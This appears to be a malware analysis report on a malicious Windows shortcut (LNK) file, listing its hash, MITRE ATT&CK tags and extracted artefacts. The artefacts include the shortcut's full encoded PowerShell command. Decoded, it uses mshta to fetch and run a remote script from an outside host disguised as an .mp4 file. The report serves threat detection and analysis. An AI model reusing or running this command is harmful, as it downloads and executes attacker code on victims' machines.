Malicious

6249bc1ecc0f57fdd1069fbcf6c7fb7b

LNK File | MD5: 6249bc1ecc0f57fdd1069fbcf6c7fb7b | Size: 2.5 KB | application/x-ms-shortcut

Tags: LNK, Malicious, LOLBin, LOLBin:powershell.exe, Execution: CMD in LNK, T1059.003, T1202: Indirect Command Execution, T1204.002, Execution: PowerShell in LNK, T1059.001, PowerShell, Batch Command, PowerShell Call, DeObfuscated
File Structure

Item | Tags | Verdict
6249bc1ecc0f57fdd1069fbcf6c7fb7b | LNK, Malicious, LOLBin, LOLBin:powershell.exe, Execution: CMD in LNK, T1059.003, T1202: Indirect Command Execution, T1204.002, Execution: PowerShell in LNK, T1059.001, PowerShell, Batch Command, PowerShell Call, DeObfuscated | Malicious
LNK CommandLine | PowerShell, Batch Command, PowerShell Call, Contains Base64 Block, Base64 Block, DeObfuscated | Malicious
[PowerShell Command] | PowerShell, DeObfuscated, Contains Base64 Block, Base64 Block | Malicious
[Deobfuscated PS] | DeObfuscated, PowerShell | Malicious
[Base64-Block] | Base64 Block |
[Lnk Summary] | | Malicious

Artefacts
Name
Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBzAF4AaABeAF4AXgB0AGEAXgBeAF4AIABeAF4AXgBeAGgAXgB0AF4AXgBeAHQAcABzADoAXgBeAC8ALwBpAG4AXgB2AF4AXgBlAHMAdABeAHQAXgByAGEAZABeAF4AXgAuAF4AXgBjAG8AXgBeAF4AXgBtAF4ALwBCAF4AXgBeAGwAXgBeAF4AXgB1AGUALgBtAF4AXgBeAHAANABeAF4AXgBeAF4AJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA

Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AbQBzAF4AaABeAF4AXgB0AGEAXgBeAF4AIABeAF4AXgBeAGgAXgB0AF4AXgBeAHQAcABzADoAXgBeAC8ALwBpAG4AXgB2AF4AXgBlAHMAdABeAHQAXgByAGEAZABeAF4AXgAuAF4AXgBjAG8AXgBeAF4AXgBtAF4ALwBCAF4AXgBeAGwAXgBeAF4AXgB1AGUALgBtAF4AXgBeAHAANABeAF4AXgBeAF4AJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA"

Characteristics
No malware configuration was found at this point.